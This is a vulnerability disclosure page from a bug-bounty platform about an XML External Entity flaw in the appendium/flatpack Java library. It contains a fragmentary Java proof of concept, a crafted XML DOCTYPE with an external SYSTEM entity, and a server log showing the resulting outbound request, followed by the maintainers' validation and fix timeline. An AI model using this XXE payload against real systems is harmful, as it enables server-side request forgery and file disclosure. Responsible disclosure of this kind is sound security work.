Improper Restriction of XML External Entity Reference in appendium/flatpack


Reported on

Oct 18th 2021


The flatpack vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the parse() function in the file may allow an attacker to execute XML External Entities (XXE).

Proof of Concept


import net.sf.flatpack.xml.*;

public class Poc {

    @SuppressWarnings({ "unused" })
    public static void main(String[] args) {
        try {
            Reader reader = new FileReader("C:\\Users\\srika\\eclipse-workspace\\poc\\src\\main\\resources\\sample-ssrf.xml");
            MapParser.parse(reader, null);

        } catch (Exception e) {


<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "">]>


Serving HTTP on :: port 8800 (http://[::]:8800/) ...
::ffff: - - [18/Oct/2021 15:10:34] "GET /test.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a a month ago
a month ago
We have contacted a member of the appendium/flatpack team and are waiting to hear back a month ago
We have sent a follow up to the appendium/flatpack team. We will try again in 7 days. a month ago
Benoit Xhenseval validated this vulnerability a month ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
Benoit Xhenseval confirmed that a fix has been merged on 5ebef7 a month ago
Srikanth Prathi has been awarded the fix bounty